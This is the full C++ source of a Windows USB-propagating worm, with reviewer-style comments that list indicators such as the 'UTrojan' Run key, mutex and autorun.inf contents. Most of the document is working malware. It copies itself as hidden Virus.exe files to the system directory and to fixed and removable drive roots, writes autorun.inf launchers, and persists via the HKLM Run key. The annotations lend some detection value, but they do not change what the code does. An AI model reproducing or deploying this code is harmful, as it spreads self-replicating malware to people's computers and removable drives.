C++ U盘感染程序源码
// Analyst annotations (reviewer-added; the code tokens below are unchanged).
// This listing is a Windows sample that copies its own executable to drive
// roots and writes an autorun.inf next to it.
// NOTE(review): the leading "print?" and the trailing "</windows></stdio>" are
// page-extraction residue, as are the spaces inside the two #include names;
// none of them are part of the program.
//
// Artifacts visible in this listing, usable as detection/triage indicators:
//   - file name "Virus.exe" in the system directory and in drive roots
//   - "autorun.inf" in drive roots whose open=/shellexecute=/shell\Auto\command=
//     entries all name Virus.exe
//   - both files on removable drives flagged ARCHIVE|HIDDEN|SYSTEM
//   - Run-key value "UTrojan" under
//     HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
//   - named mutex "UTrojan"
// Mitigation note: the autorun.inf mechanism only has effect where AutoRun is
// honoured for the drive type; it can be disabled by policy
// (NoDriveTypeAutoRun). Confirm the effective setting on the hosts assessed.
print?#include "stdafx.h"
#include <stdio .h>
#include <windows .h>

HANDLE hMutex;                        // mutex handle (the original comment called it a "semaphore handle")
DWORD WINAPI infect(LPVOID lpParam);  // removable-drive copy loop (thread entry point)
void Install(void);                   // copy to system directory + Run-key entry
void InfectOtherDisk();               // copy to fixed-drive roots
char ExeFile[MAX_PATH];               // full path of the running image, filled in by WinMain

//==========================================================================
// Install: called from WinMain when the current drive is removable.
//   1. Copies the running image (ExeFile) to <system directory>\Virus.exe;
//      the third CopyFile argument is true, so an existing file is not
//      overwritten.
//   2. Opens HKLM\...\CurrentVersion\Run with KEY_ALL_ACCESS and sets the
//      REG_SZ value "UTrojan" to that path. None of the registry return codes
//      are checked.
//      NOTE(review): writing here presumably requires administrative rights;
//      confirm against the host configuration.
//   3. Starts "explorer <first three characters of ExeFile>", i.e. opens the
//      root of the drive the image was started from.
void Install(void)
{
    char FilePath[255]={0};
    char Explorer[12]="explorer ";
    HKEY AutoStart;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    ZeroMemory( &si, sizeof(si) );
    si.cb = sizeof(si);
    ZeroMemory( &pi, sizeof(pi) );

    if(GetSystemDirectory(FilePath,254) == 0)
    {
        return;
    }
    strcat(FilePath, "\\Virus.exe");
    CopyFile(ExeFile, FilePath, true);

    // Persistence artifact: Run-key value "UTrojan" -> <system directory>\Virus.exe
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &AutoStart);
    RegSetValueEx(AutoStart,            // subkey handle
        "UTrojan",                      // value name
        0,                              // must be zero
        REG_SZ,                         // value type
        (LPBYTE) FilePath,              // pointer to value data
        strlen(FilePath) + 1);          // length of value data
    RegCloseKey(AutoStart);

    strcpy(FilePath,ExeFile);           // FilePath is now reused as a scratch buffer
    FilePath[3]='\0';                   // keep only the first three characters of the image path
    strcat(Explorer,FilePath);
    CreateProcess( NULL,                // open the USB stick's directory as usual
        Explorer,
        NULL,
        NULL,
        FALSE,
        0,
        NULL,
        NULL,
        &si,
        &pi );
    return;
}

//==========================================================================
// infect: thread routine started from WinMain (lpParam is unused).
// Loops forever; on each pass it lists the logical drives and, for every drive
// reported as DRIVE_REMOVABLE:
//   - clears attributes on, deletes and re-copies <root>Virus.exe from ExeFile
//   - clears attributes on, deletes and rewrites <root>autorun.inf with four
//     fixed lines that name Virus.exe
//   - sets ARCHIVE|HIDDEN|SYSTEM on both files
// then sleeps 3000 ms. The return statement after the loop is never reached.
DWORD WINAPI infect(LPVOID lpParam)
{
    char Drives[255];
    int DriveType;
    char *pDrive=0;
    char FilePath[25];
    FILE *AutoRun;

    while(true)
    {
        memset(Drives,0,255);
        memset(FilePath,0,25);
        pDrive=Drives;
        DriveType=0;
        AutoRun=NULL;
        GetLogicalDriveStrings(254,Drives);
        while(pDrive[0]!=NULL)
        {
            DriveType=GetDriveType(pDrive);
            if(DriveType!=DRIVE_REMOVABLE)
            {
                // step to the next entry; the code assumes each entry is
                // "X:\" plus a terminator, i.e. four characters
                pDrive+=4;
                continue;
            }
            strcpy(FilePath,pDrive);
            strcat(FilePath,"Virus.exe");
            SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
            DeleteFile(FilePath);
            CopyFile(ExeFile, FilePath,false);
            SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);

            strcpy(FilePath,pDrive);
            strcat(FilePath,"autorun.inf");
            SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
            DeleteFile(FilePath);
            AutoRun=fopen(FilePath,"w+");
            if(AutoRun!=NULL)
            {
                // Fixed autorun.inf content; these four strings are stable
                // indicators for content-based scanning of removable media.
                fputs("[AutoRun]\n",AutoRun);
                fputs("open=Virus.exe\n",AutoRun);
                fputs("shellexecute=Virus.exe\n",AutoRun);
                fputs("shell\\Auto\\command=Virus.exe",AutoRun);
            }
            fclose(AutoRun);
            SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
            pDrive+=4;
        }
        Sleep(3000); // poll every 3 seconds for a USB stick
    }
    return 0;
}

//==========================================================================
// InfectOtherDisk: one pass over the logical-drive list. While the current
// entry is DRIVE_FIXED it copies ExeFile to <root>Virus.exe and copies a file
// named "autorun.inf" (relative path, so resolved against the process's
// current directory) to <root>autorun.inf, both without overwriting an
// existing file, and sets ARCHIVE|HIDDEN|SYSTEM on both targets. The walk
// stops at the first entry that is not a fixed drive.
void InfectOtherDisk(void)
{
    char Drives[255];
    int DriveType;
    char *pDrive=0;
    char AppFilePath[25];
    char InfFilePath[25];

    memset(Drives,0,255);
    memset(AppFilePath,0,25);
    memset(InfFilePath,0,25);
    pDrive=Drives;
    DriveType=0;
    GetLogicalDriveStrings(254,Drives);
    while(pDrive[0]!=NULL)
    {
        DriveType=GetDriveType(pDrive);
        if(DriveType==DRIVE_FIXED)
        {
            strcpy(AppFilePath,pDrive);
            strcpy(InfFilePath,pDrive);
            strcat(AppFilePath,"Virus.exe");
            strcat(InfFilePath,"autorun.inf");
            CopyFile(ExeFile,AppFilePath, true);
            SetFileAttributes(AppFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
            CopyFile("autorun.inf",InfFilePath,true);
            SetFileAttributes(InfFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
            pDrive+=4;
        }
        else
        {
            break;
        }
    }
}

//==========================================================================
// WinMain: entry point. Records the image path in ExeFile, creates the named
// mutex "UTrojan" (exits if creation fails), then branches on the type of the
// drive holding the current directory (GetDriveType(NULL)):
//   DRIVE_REMOVABLE -> Install(), InfectOtherDisk(), release the mutex, exit
//   DRIVE_FIXED     -> InfectOtherDisk(), start infect() on a new thread,
//                      then return from WinMain
//   anything else   -> exit
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpCmdLine,
                     int nCmdShow)
{
    // TODO: Place code here.
    int DriveType;

    GetModuleFileName(NULL,ExeFile,MAX_PATH); // get the path of this program
    // Named mutex "UTrojan": a host-side indicator visible in handle listings.
    if((hMutex=CreateMutex(NULL,true,"UTrojan"))==NULL)
    {
        return 0;
    }
    DriveType=GetDriveType(NULL);
    if(DriveType==DRIVE_REMOVABLE)
    {
        Install();
        InfectOtherDisk();
        ReleaseMutex(hMutex);
        return 0;
    }
    else if (DriveType==DRIVE_FIXED)
    {
        InfectOtherDisk();
        CreateThread(NULL,NULL,infect,NULL,NULL,NULL);
        return 0;
    }
    else
    {
        return 0;
    }
}
</windows></stdio>